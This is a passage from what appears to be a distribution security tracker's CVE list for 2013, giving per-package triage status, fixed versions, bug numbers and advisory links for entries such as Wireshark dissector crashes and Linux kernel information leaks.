CVE-2013-3562 [wireshark: Websocket dissector crash] - wireshark (bug #709167) TODO: check NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8499 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-29.html CVE-2013-3561 [wirehark: Websocket dissector crash] - wireshark (bug #709167) TODO: check NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8448 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-29.html CVE-2013-3560 [wireshark: MPEG DSM-CC dissector crash] - wireshark (bug #709167) TODO: check NOTE: http://www.wireshark.org/security/wnpa-sec-2013-28.html CVE-2013-3559 [wireshark: DCP ETSI dissector crash] - wireshark (bug #709167) TODO: check NOTE: http://www.wireshark.org/security/wnpa-sec-2013-27.html CVE-2013-3558 [wireshark: PPP CCP dissector crash] - wireshark (bug #709167) TODO: check NOTE: http://www.wireshark.org/security/wnpa-sec-2013-26.html CVE-2013-3557 [wireshark: ASN.1 BER dissector crash] - wireshark (bug #709167) TODO: check NOTE: http://www.wireshark.org/security/wnpa-sec-2013-25.html CVE-2013-3556 [wireshark: ASN.1 BER dissector crash] - wireshark (bug #709167) TODO: check NOTE: http://www.wireshark.org/security/wnpa-sec-2013-25.html CVE-2013-3555 [wireshark: GTPv2 dissector crash] - wireshark (bug #709167) TODO: check NOTE: http://www.wireshark.org/security/wnpa-sec-2013-24.html CVE-2013-3554 RESERVED CVE-2013-3553 RESERVED CVE-2013-3552 RESERVED CVE-2013-3551 RESERVED CVE-2013-XXXX [rrdtool: format string vulnerability] - rrdtool (bug #708866) CVE-2013-3550 RESERVED CVE-2013-3549 RESERVED CVE-2013-3548 RESERVED CVE-2013-3547 RESERVED CVE-2013-3546 RESERVED CVE-2013-3545 RESERVED CVE-2013-3544 RESERVED CVE-2013-3543 RESERVED CVE-2013-3542 RESERVED CVE-2013-3541 RESERVED CVE-2013-3540 RESERVED CVE-2013-3539 RESERVED CVE-2013-3538 (Multiple cross-site scripting (XSS) vulnerabilities in todooforum.php ...) NOT-FOR-US: Todoo Forum CVE-2013-3537 (Multiple SQL injection vulnerabilities in todooforum.php in Todoo ...) NOT-FOR-US: Todoo Forum CVE-2013-3536 (SQL injection vulnerability in the gp_LoadUserFromHash function in ...) NOT-FOR-US: grouppay plugin CVE-2013-3535 (Multiple cross-site scripting (XSS) vulnerabilities in CMSLogik 1.2.0 ...) NOT-FOR-US: CMSLogik CVE-2013-3534 (Cross-site scripting (XSS) vulnerability in the aiContactSafe ...) NOT-FOR-US: aiContactSafe CVE-2013-3533 (Multiple SQL injection vulnerabilities in Virtual Access Monitor ...) NOT-FOR-US: Virtual Access Monitor CVE-2013-3532 (SQL injection vulnerability in settings.php in the Web Dorado Spider ...) NOT-FOR-US: WordPress plugin CVE-2013-3531 (SQL injection vulnerability in meneger.php in RadioCMS 2.2 allows ...) NOT-FOR-US: RadioCMS CVE-2013-3530 (SQL injection vulnerability in playlist.php in the Spiffy XSPF Player ...) NOT-FOR-US: WordPress plugin CVE-2013-3529 (Multiple cross-site scripting (XSS) vulnerabilities in user/obits.php ...) NOT-FOR-US: WordPress plugin CVE-2013-3528 (Unspecified vulnerability in the update check in Vanilla Forums before ...) NOT-FOR-US: Vanilla Forums CVE-2013-3527 (Multiple SQL injection vulnerabilities in Vanilla Forums before ...) NOT-FOR-US: Vanilla Forums CVE-2013-3526 (Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the ...) NOT-FOR-US: WordPress plugin CVE-2013-3525 (** DISPUTED ** ...) NOTE: http://blog.bestpractical.com/2013/04/on-our-security-policies.html CVE-2013-3524 (SQL injection vulnerability in popupnewsitem/ in the Pop Up News ...) NOT-FOR-US: phpVMS CVE-2013-3523 (SQL injection vulnerability in This HTML Is Simple (THIS) before 1.2.4 ...) NOT-FOR-US: This HTML Is Simple CVE-2013-3522 (SQL injection vulnerability in index.php/ajax/api/reputation/vote in ...) NOT-FOR-US: vBulletin CVE-2012-6552 (Unspecified vulnerability in admin/action.php in phpVMS 2.1.x before ...) NOT-FOR-US: phpVMS CVE-2013-3521 RESERVED CVE-2013-3520 RESERVED CVE-2013-3519 RESERVED CVE-2013-3518 RESERVED CVE-2013-3517 RESERVED CVE-2013-3516 RESERVED CVE-2013-3515 RESERVED CVE-2013-3514 RESERVED CVE-2013-3513 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Noma ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3512 (The Cacti component in GroundWork Monitor Enterprise 6.7.0 does not ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3511 (Open redirect vulnerability in the NeDi component in GroundWork ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3510 (Multiple SQL injection vulnerabilities in GroundWork Monitor ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3509 (html/System-NeDi.php in the NeDi component in GroundWork Monitor ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3508 (html/System-Files.php in the System File Overview feature in the NeDi ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3507 (The NeDi component in GroundWork Monitor Enterprise 6.7.0 allows ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3506 (cgi-bin/performance/perfchart.cgi in the Performance component in ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3505 (The Nagios-App component in GroundWork Monitor Enterprise 6.7.0 allows ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3504 (Directory traversal vulnerability in monarch.cgi in the MONARCH ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3503 (The Profile Importer feature in monarch.cgi in the MONARCH component ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3502 (monarch_scan.cgi in the MONARCH component in GroundWork Monitor ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3501 (Multiple cross-site scripting (XSS) vulnerabilities in GroundWork ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3500 (The Foundation webapp admin interface in GroundWork Monitor Enterprise ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3499 (GroundWork Monitor Enterprise 6.7.0 performs authentication on the ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3498 (Cross-site scripting (XSS) vulnerability in Juniper SmartPass WLAN ...) NOT-FOR-US: Juniper CVE-2013-3497 (Juniper Junos Space before 12.3P2.8, as used on the JA1500 appliance ...) NOT-FOR-US: Juniper CVE-2013-3496 RESERVED CVE-2013-3495 RESERVED CVE-2013-3494 RESERVED CVE-2013-3493 RESERVED CVE-2013-3492 RESERVED CVE-2013-3491 RESERVED CVE-2013-3490 RESERVED CVE-2013-3489 RESERVED CVE-2013-3488 RESERVED CVE-2013-3487 RESERVED CVE-2013-3486 RESERVED CVE-2013-3485 RESERVED CVE-2013-3484 RESERVED CVE-2013-3483 RESERVED CVE-2013-3482 RESERVED CVE-2013-3481 RESERVED CVE-2013-3480 RESERVED CVE-2013-3479 RESERVED CVE-2013-3478 RESERVED CVE-2013-3477 RESERVED CVE-2013-3476 RESERVED CVE-2013-3475 RESERVED CVE-2013-3474 RESERVED CVE-2013-3473 RESERVED CVE-2013-3472 RESERVED CVE-2013-3471 RESERVED CVE-2013-3470 RESERVED CVE-2013-3469 RESERVED CVE-2013-3468 RESERVED CVE-2013-3467 RESERVED CVE-2013-3466 RESERVED CVE-2013-3465 RESERVED CVE-2013-3464 RESERVED CVE-2013-3463 RESERVED CVE-2013-3462 RESERVED CVE-2013-3461 RESERVED CVE-2013-3460 RESERVED CVE-2013-3459 RESERVED CVE-2013-3458 RESERVED CVE-2013-3457 RESERVED CVE-2013-3456 RESERVED CVE-2013-3455 RESERVED CVE-2013-3454 RESERVED CVE-2013-3453 RESERVED CVE-2013-3452 RESERVED CVE-2013-3451 RESERVED CVE-2013-3450 RESERVED CVE-2013-3449 RESERVED CVE-2013-3448 RESERVED CVE-2013-3447 RESERVED CVE-2013-3446 RESERVED CVE-2013-3445 RESERVED CVE-2013-3444 RESERVED CVE-2013-3443 RESERVED CVE-2013-3442 RESERVED CVE-2013-3441 RESERVED CVE-2013-3440 RESERVED CVE-2013-3439 RESERVED CVE-2013-3438 RESERVED CVE-2013-3437 RESERVED CVE-2013-3436 RESERVED CVE-2013-3435 RESERVED CVE-2013-3434 RESERVED CVE-2013-3433 RESERVED CVE-2013-3432 RESERVED CVE-2013-3431 RESERVED CVE-2013-3430 RESERVED CVE-2013-3429 RESERVED CVE-2013-3428 RESERVED CVE-2013-3427 RESERVED CVE-2013-3426 RESERVED CVE-2013-3425 RESERVED CVE-2013-3424 RESERVED CVE-2013-3423 RESERVED CVE-2013-3422 RESERVED CVE-2013-3421 RESERVED CVE-2013-3420 RESERVED CVE-2013-3419 RESERVED CVE-2013-3418 RESERVED CVE-2013-3417 RESERVED CVE-2013-3416 RESERVED CVE-2013-3415 RESERVED CVE-2013-3414 RESERVED CVE-2013-3413 RESERVED CVE-2013-3412 RESERVED CVE-2013-3411 RESERVED CVE-2013-3410 RESERVED CVE-2013-3409 RESERVED CVE-2013-3408 RESERVED CVE-2013-3407 RESERVED CVE-2013-3406 RESERVED CVE-2013-3405 RESERVED CVE-2013-3404 RESERVED CVE-2013-3403 RESERVED CVE-2013-3402 RESERVED CVE-2013-3401 RESERVED CVE-2013-3400 RESERVED CVE-2013-3399 RESERVED CVE-2013-3398 RESERVED CVE-2013-3397 RESERVED CVE-2013-3396 RESERVED CVE-2013-3395 RESERVED CVE-2013-3394 RESERVED CVE-2013-3393 RESERVED CVE-2013-3392 RESERVED CVE-2013-3391 RESERVED CVE-2013-3390 RESERVED CVE-2013-3389 RESERVED CVE-2013-3388 RESERVED CVE-2013-3387 RESERVED CVE-2013-3386 RESERVED CVE-2013-3385 RESERVED CVE-2013-3384 RESERVED CVE-2013-3383 RESERVED CVE-2013-3382 RESERVED CVE-2013-3381 RESERVED CVE-2013-3380 RESERVED CVE-2013-3379 RESERVED CVE-2013-3378 RESERVED CVE-2013-3377 RESERVED CVE-2013-3376 RESERVED CVE-2013-3375 RESERVED CVE-2013-3374 RESERVED CVE-2013-3373 RESERVED CVE-2013-3372 RESERVED CVE-2013-3371 RESERVED CVE-2013-3370 RESERVED CVE-2013-3369 RESERVED CVE-2013-3368 RESERVED CVE-2013-3367 RESERVED CVE-2013-3366 RESERVED CVE-2013-3365 RESERVED CVE-2013-3364 RESERVED CVE-2013-3363 RESERVED CVE-2013-3362 RESERVED CVE-2013-3361 RESERVED CVE-2013-3360 RESERVED CVE-2013-3359 RESERVED CVE-2013-3358 RESERVED CVE-2013-3357 RESERVED CVE-2013-3356 RESERVED CVE-2013-3355 RESERVED CVE-2013-3354 RESERVED CVE-2013-3353 RESERVED CVE-2013-3352 RESERVED CVE-2013-3351 RESERVED CVE-2013-3350 RESERVED CVE-2013-3349 RESERVED CVE-2013-3348 RESERVED CVE-2013-3347 RESERVED CVE-2013-3346 RESERVED CVE-2013-3345 RESERVED CVE-2013-3344 RESERVED CVE-2013-3343 RESERVED CVE-2013-3342 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-3341 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-3340 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-3339 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-3338 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-3337 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-3336 (Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-3335 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3334 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3333 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3332 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3331 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3330 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3329 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3328 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3327 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3326 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3325 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3324 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-3323 RESERVED CVE-2013-3322 RESERVED CVE-2013-3321 RESERVED CVE-2013-3320 RESERVED CVE-2013-3319 RESERVED CVE-2013-3318 RESERVED CVE-2013-3317 RESERVED CVE-2013-3316 RESERVED CVE-2013-3315 RESERVED CVE-2013-3314 RESERVED CVE-2013-3313 RESERVED CVE-2013-3312 RESERVED CVE-2013-3311 RESERVED CVE-2013-3310 RESERVED CVE-2009-5135 (The Java XML parser in Echo before 2.1.1 and 3.x before 3.0.b6 allows ...) NOT-FOR-US: Echo CVE-2013-3309 RESERVED CVE-2013-3308 RESERVED CVE-2013-3307 RESERVED CVE-2013-3306 RESERVED CVE-2013-3305 RESERVED CVE-2013-3304 RESERVED CVE-2013-3303 RESERVED CVE-2013-XXXX [automysqlbackup code injection] - automysqlbackup 2.6+debian.3-1 (bug #706099) CVE-2013-XXXX [autopostgresqlbackup code injection] - autopostgresqlbackup 1.0-2 (bug #706095) CVE-2013-3300 RESERVED CVE-2013-3299 RESERVED CVE-2013-3298 RESERVED CVE-2013-3297 RESERVED CVE-2013-3296 RESERVED CVE-2013-3295 RESERVED CVE-2013-3294 RESERVED CVE-2013-3293 RESERVED CVE-2013-3292 RESERVED CVE-2013-3291 RESERVED CVE-2013-3290 RESERVED CVE-2013-3289 RESERVED CVE-2013-3288 RESERVED CVE-2013-3287 RESERVED CVE-2013-3286 RESERVED CVE-2013-3285 RESERVED CVE-2013-3284 RESERVED CVE-2013-3283 RESERVED CVE-2013-3282 RESERVED CVE-2013-3281 RESERVED CVE-2013-3280 RESERVED CVE-2013-3279 RESERVED CVE-2013-3278 RESERVED CVE-2013-3277 RESERVED CVE-2013-3276 RESERVED CVE-2013-3275 RESERVED CVE-2013-3274 RESERVED CVE-2013-3273 RESERVED CVE-2013-3272 RESERVED CVE-2013-3271 RESERVED CVE-2013-3270 (EMC VNX Control Station before 7.1.70.2 and Celerra Control Station ...) NOT-FOR-US: EMC CVE-2013-3302 (Race condition in the smb_send_rqst function in fs/cifs/transport.c in ...) - linux-2.6 (Introduced in 3.7) - linux [wheezy] - linux (Introduced in 3.7) CVE-2013-3301 (The ftrace implementation in the Linux kernel before 3.8.8 allows ...) {DSA-2669-1} - linux-2.6 (low) - linux 3.8.11-1 (low) NOTE: https://git.kernel.org/linus/6a76f8c0ab19f215af2a3442870eeb5f0e81998d NOTE: Not enabled in default kernels CVE-2013-3269 (Cross-site request forgery (CSRF) vulnerability in Cybozu Office ...) NOT-FOR-US: Cybozu Office CVE-2013-3268 (Novell iManager 2.7 before SP6 Patch 1 does not refresh a token after ...) NOT-FOR-US: Novell iManager CVE-2013-3267 (Cross-site scripting (XSS) vulnerability in the highlighter plugin in ...) - joomla (bug #571794) CVE-2013-3266 (The nfsrvd_readdir function in sys/fs/nfsserver/nfs_nfsdport.c in the ...) - kfreebsd-9 9.0-11 (bug #706414) - kfreebsd-8 (bug #706418) NOTE: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:05.nfsserver.asc CVE-2013-3265 RESERVED CVE-2013-3264 RESERVED CVE-2013-3263 RESERVED CVE-2013-3262 RESERVED CVE-2013-3261 RESERVED CVE-2013-3260 RESERVED CVE-2013-3259 RESERVED CVE-2013-3258 RESERVED CVE-2013-3257 RESERVED CVE-2013-3256 RESERVED CVE-2013-3255 RESERVED CVE-2013-3254 (Cross-site scripting (XSS) vulnerability in wp-admin/admin.php in the ...) NOT-FOR-US: WordPress plugin CVE-2013-3253 RESERVED CVE-2013-3252 RESERVED CVE-2013-3251 RESERVED CVE-2013-3250 RESERVED CVE-2013-3249 RESERVED CVE-2013-3248 RESERVED CVE-2013-3247 RESERVED CVE-2013-3246 RESERVED CVE-2013-3245 RESERVED CVE-2013-3244 RESERVED CVE-2013-3243 RESERVED CVE-2013-3242 (plugins/system/remember/remember.php in Joomla! 2.5.x before 2.5.10 ...) - joomla (bug #571794) CVE-2013-3241 (export.php (aka the export script) in phpMyAdmin 4.x before 4.0.0-rc3 ...) - phpmyadmin (Vulnerable code not present) CVE-2013-3240 (Directory traversal vulnerability in the Export feature in phpMyAdmin ...) - phpmyadmin (Vulnerable code not present) CVE-2013-3239 (phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir ...) - phpmyadmin 4:3.4.11.1-2 [squeeze] - phpmyadmin (Minor issue) NOTE: Requires non-default option saveDir to be enabled, an authenticated untrusted user and Apache mod_mime CVE-2013-3238 (phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3 allows remote ...) - phpmyadmin (exploitable PHP on Windows only) NOTE: code patched in 4:3.4.11.1-2 nonetheless CVE-2013-3237 (The vsock_stream_sendmsg function in net/vmw_vsock/af_vsock.c in the ...) - linux-2.6 ((net/vmw_vsock/af_vsock.c not present) - linux (net/vmw_vsock/af_vsock.c not present) - open-vm-tools (low; bug #706557) [wheezy] - open-vm-tools (Minor information leak) [squeeze] - open-vm-tools (Contrib not supported, minor information leak) NOTE: open-vm-tools fixed in experimental with 2:9.2.2-893683-8 (update entry when unstable has the fix) CVE-2013-3236 (The vmci_transport_dgram_dequeue function in ...) - linux-2.6 (VM Sockets only introduced in 3.9-rc1) - linux (VM Sockets introduced in 3.9-rc1) CVE-2013-3235 (net/tipc/socket.c in the Linux kernel before 3.9-rc7 does not ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3234 (The rose_recvmsg function in net/rose/af_rose.c in the Linux kernel ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3233 (The llcp_sock_recvmsg function in net/nfc/llcp/sock.c in the Linux ...) - linux-2.6 (net/nfc/llcp/sock.c not present, introduced in 3.3) - linux (net/nfc/llcp/sock.c not present, introduced in 3.3) CVE-2013-3232 (The nr_recvmsg function in net/netrom/af_netrom.c in the Linux kernel ...) - linux-2.6 (Introduced and fixed during 3.9 cycle) - linux (Introduced and fixed during 3.9 cycle) CVE-2013-3231 (The llc_ui_recvmsg function in net/llc/af_llc.c in the Linux kernel ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3230 (The l2tp_ip6_recvmsg function in net/l2tp/l2tp_ip6.c in the Linux ...) - linux-2.6 (net/l2tp/l2tp_ip6.c not present) - linux (net/l2tp/l2tp_ip6.c introduced in 3.5) CVE-2013-3229 (The iucv_sock_recvmsg function in net/iucv/af_iucv.c in the Linux ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3228 (The irda_recvmsg_dgram function in net/irda/af_irda.c in the Linux ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3227 (The caif_seqpkt_recvmsg function in net/caif/caif_socket.c in the ...) {DSA-2669-1} - linux-2.6 (net/caif/caif_socket.c introduced in v2.6.35) - linux 3.8.11-1 (low) CVE-2013-3226 (The sco_sock_recvmsg function in net/bluetooth/sco.c in the Linux ...) - linux-2.6 (Vulnerable code not yet present) - linux (Vulnerable code not yet present) NOTE: sco_sock_recvmsg only introduced with v3.8, bt_sock_recvmsg has its own CVE ID CVE-2013-3225 (The rfcomm_sock_recvmsg function in net/bluetooth/rfcomm/sock.c in the ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3224 (The bt_sock_recvmsg function in net/bluetooth/af_bluetooth.c in the ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3223 (The ax25_recvmsg function in net/ax25/af_ax25.c in the Linux kernel ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3222 (The vcc_recvmsg function in net/atm/common.c in the Linux kernel ...) {DSA-2669-1 DSA-2668-1} - linux-2.6 (low) - linux 3.8.11-1 (low) CVE-2013-3221 (The Active Record component in Ruby on Rails 2.3.x, 3.0.x, 3.1.x, and ...) - ruby-activerecord-3.2 (unimportant) - ruby-activerecord-2.3 (unimportant) - rails 2.3.14.1 (unimportant) NOTE: Starting with 2.3.14.1 rails is a transition package NOTE: This is a general design problem and only mitigated by documented best practices CVE-2013-3220 RESERVED CVE-2013-3219 RESERVED CVE-2013-3218 RESERVED CVE-2013-3217 RESERVED CVE-2013-3216 RESERVED CVE-2013-3215 RESERVED CVE-2013-3214 RESERVED CVE-2013-3213 RESERVED CVE-2013-3212 RESERVED CVE-2012-6551 (The default configuration of Apache ActiveMQ before 5.8.0 enables a ...) - activemq (Example code not shipped in .deb) CVE-2013-3211 (Unspecified vulnerability in Opera before 12.15 has unknown impact and ...) NOT-FOR-US: Opera CVE-2013-3210 (Opera before 12.15 does not properly block top-level domains in ...) NOT-FOR-US: Opera CVE-2013-3209 RESERVED CVE-2013-3208 RESERVED CVE-2013-3207 RESERVED CVE-2013-3206 RESERVED CVE-2013-3205 RESERVED CVE-2013-3204 RESERVED CVE-2013-3203 RESERVED CVE-2013-3202 RESERVED CVE-2013-3201 RESERVED CVE-2013-3200 RESERVED CVE-2013-3199 RESERVED CVE-2013-3198 RESERVED CVE-2013-3197 RESERVED CVE-2013-3196 RESERVED CVE-2013-3195 RESERVED CVE-2013-3194 RESERVED CVE-2013-3193 RESERVED CVE-2013-3192 RESERVED CVE-2013-3191 RESERVED CVE-2013-3190 RESERVED CVE-2013-3189 RESERVED CVE-2013-3188 RESERVED CVE-2013-3187 RESERVED CVE-2013-3186 RESERVED CVE-2013-3185 RESERVED CVE-2013-3184 RESERVED CVE-2013-3183 RESERVED CVE-2013-3182 RESERVED CVE-2013-3181 RESERVED CVE-2013-3180 RESERVED CVE-2013-3179 RESERVED CVE-2013-3178 RESERVED CVE-2013-3177 RESERVED CVE-2013-3176 RESERVED CVE-2013-3175 RESERVED CVE-2013-3174 RESERVED CVE-2013-3173 RESERVED CVE-2013-3172 RESERVED CVE-2013-3171 RESERVED CVE-2013-3170 RESERVED CVE-2013-3169 RESERVED CVE-2013-3168 RESERVED CVE-2013-3167 RESERVED CVE-2013-3166 RESERVED CVE-2013-3165 RESERVED CVE-2013-3164 RESERVED CVE-2013-3163 RESERVED CVE-2013-3162 RESERVED CVE-2013-3161 RESERVED CVE-2013-3160 RESERVED CVE-2013-3159 RESERVED CVE-2013-3158 RESERVED CVE-2013-3157 RESERVED CVE-2013-3156 RESERVED CVE-2013-3155 RESERVED CVE-2013-3154 RESERVED CVE-2013-3153 RESERVED CVE-2013-3152 RESERVED CVE-2013-3151 RESERVED CVE-2013-3150 RESERVED CVE-2013-3149 RESERVED CVE-2013-3148 RESERVED CVE-2013-3147 RESERVED CVE-2013-3146 RESERVED CVE-2013-3145 RESERVED CVE-2013-3144 RESERVED CVE-2013-3143 RESERVED CVE-2013-3142 RESERVED CVE-2013-3141 RESERVED CVE-2013-3140 RESERVED CVE-2013-3139 RESERVED CVE-2013-3138 RESERVED CVE-2013-3137 RESERVED CVE-2013-3136 RESERVED CVE-2013-3135 RESERVED CVE-2013-3134 RESERVED CVE-2013-3133 RESERVED CVE-2013-3132 RESERVED CVE-2013-3131 RESERVED CVE-2013-3130 RESERVED CVE-2013-3129 RESERVED CVE-2013-3128 RESERVED CVE-2013-3127 RESERVED CVE-2013-3126 RESERVED CVE-2013-3125 RESERVED CVE-2013-3124 RESERVED CVE-2013-3123 RESERVED CVE-2013-3122 RESERVED CVE-2013-3121 RESERVED CVE-2013-3120 RESERVED CVE-2013-3119 RESERVED CVE-2013-3118 RESERVED CVE-2013-3117 RESERVED CVE-2013-3116 RESERVED CVE-2013-3115 RESERVED CVE-2013-3114 RESERVED CVE-2013-3113 RESERVED CVE-2013-3112 RESERVED CVE-2013-3111 RESERVED CVE-2013-3110 RESERVED CVE-2013-3109 RESERVED CVE-2013-3108 RESERVED CVE-2013-3107 (VMware vCenter Server 5.1 before Update 1, when anonymous LDAP binding ...) NOT-FOR-US: vCenter CVE-2013-3106 RESERVED CVE-2013-3105 RESERVED CVE-2013-3104 RESERVED CVE-2013-3103 RESERVED CVE-2013-3102 RESERVED CVE-2013-3101 RESERVED CVE-2013-3100 RESERVED CVE-2013-3099 RESERVED CVE-2013-3098 RESERVED CVE-2013-3097 RESERVED CVE-2013-3096 RESERVED CVE-2013-3095 RESERVED CVE-2013-3094 RESERVED CVE-2013-3093 RESERVED CVE-2013-3092 RESERVED CVE-2013-3091 RESERVED CVE-2013-3090 RESERVED CVE-2013-3089 RESERVED CVE-2013-3088 RESERVED CVE-2013-3087 RESERVED CVE-2013-3086 RESERVED CVE-2013-3085 RESERVED CVE-2013-3084 RESERVED CVE-2013-3083 RESERVED CVE-2013-3082 RESERVED CVE-2013-3081 RESERVED CVE-2013-3080 (VMware vCenter Server Appliance (vCSA) 5.1 before Update 1 allows ...) NOT-FOR-US: vCenter CVE-2013-3079 (VMware vCenter Server Appliance (vCSA) 5.1 before Update 1 allows ...) NOT-FOR-US: vCenter CVE-2013-3078 RESERVED CVE-2013-3077 RESERVED CVE-2013-3076 (The crypto API in the Linux kernel through 3.9-rc8 does not initialize ...) {DSA-2669-1} - linux 3.8.11-1 (low) - linux-2.6 (Vulnerable code not present) CVE-2013-3075 (Multiple buffer overflows in ActUWzd.dll 1.0.0.1 in Mitsubishi MX ...) NOT-FOR-US: Mitsubishi MX Component 3 CVE-2013-3074 RESERVED CVE-2013-3073 RESERVED CVE-2013-3072 RESERVED CVE-2013-3071 RESERVED CVE-2013-3070 RESERVED CVE-2013-3069 RESERVED CVE-2013-3068 RESERVED CVE-2013-3067 RESERVED CVE-2013-3066 RESERVED CVE-2013-3065 RESERVED CVE-2013-3064 RESERVED CVE-2013-3063 (SAP BASIS Communication Services 4.6B through 7.30 allows remote ...) NOT-FOR-US: SAP BASIS Communication Services CVE-2013-3062 (The CP_RC_TRANSACTION_CALL_BY_SET function in the Engineering ...) NOT-FOR-US: SAP CVE-2013-3061 (The ISHMED-PATRED_TRANSACT_RFCCALL function in the IS-H ...) NOT-FOR-US: SAP CVE-2013-3060 (The web console in Apache ActiveMQ before 5.8.0 does not require ...) - activemq (Web console not provided in Debian package, see #702670) CVE-2013-3059 (Cross-site scripting (XSS) vulnerability in the Voting plugin in ...) - joomla (bug #571794) CVE-2013-3058 (Cross-site scripting (XSS) vulnerability in Joomla! 2.5.x before ...) - joomla (bug #571794) CVE-2013-3057 (Joomla! 2.5.x before 2.5.10 and 3.0.x before 3.0.4 allows remote ...) - joomla (bug #571794) CVE-2013-3056 (Joomla! 2.5.x before 2.5.10 and 3.0.x before 3.0.4 allows remote ...) - joomla (bug #571794) CVE-2013-3055 (Lexmark Markvision Enterprise before 1.8 provides a diagnostic ...) NOT-FOR-US: Lexmark Markvision Enterprise CVE-2013-3054 RESERVED CVE-2013-3053 RESERVED CVE-2013-3052 RESERVED CVE-2013-3051 (The TrustZone kernel, when used in conjunction with a certain Motorola ...) NOT-FOR-US: TrustZone kernel CVE-2013-3050 (SQL injection vulnerability in ZAPms 1.41 and earlier allows remote ...) NOT-FOR-US: ZAPms CVE-2013-3049 RESERVED CVE-2013-3048 RESERVED CVE-2013-3047 RESERVED CVE-2013-3046 RESERVED CVE-2013-3045 RESERVED CVE-2013-3044 RESERVED CVE-2013-3043 RESERVED CVE-2013-3042 RESERVED CVE-2013-3041 RESERVED CVE-2013-3040 RESERVED CVE-2013-3039 RESERVED CVE-2013-3038 RESERVED CVE-2013-3037 RESERVED CVE-2013-3036 RESERVED CVE-2013-3035 RESERVED CVE-2013-3034 RESERVED CVE-2013-3033 RESERVED CVE-2013-3032 RESERVED CVE-2013-3031 RESERVED CVE-2013-3030 RESERVED CVE-2013-3029 RESERVED CVE-2013-3028 RESERVED CVE-2013-3027 RESERVED CVE-2013-3026 RESERVED CVE-2013-3025 RESERVED CVE-2013-3024 RESERVED CVE-2013-3023 RESERVED CVE-2013-3022 RESERVED CVE-2013-3021 RESERVED CVE-2013-3020 RESERVED CVE-2013-3019 RESERVED CVE-2013-3018 RESERVED CVE-2013-3017 RESERVED CVE-2013-3016 RESERVED CVE-2013-3015 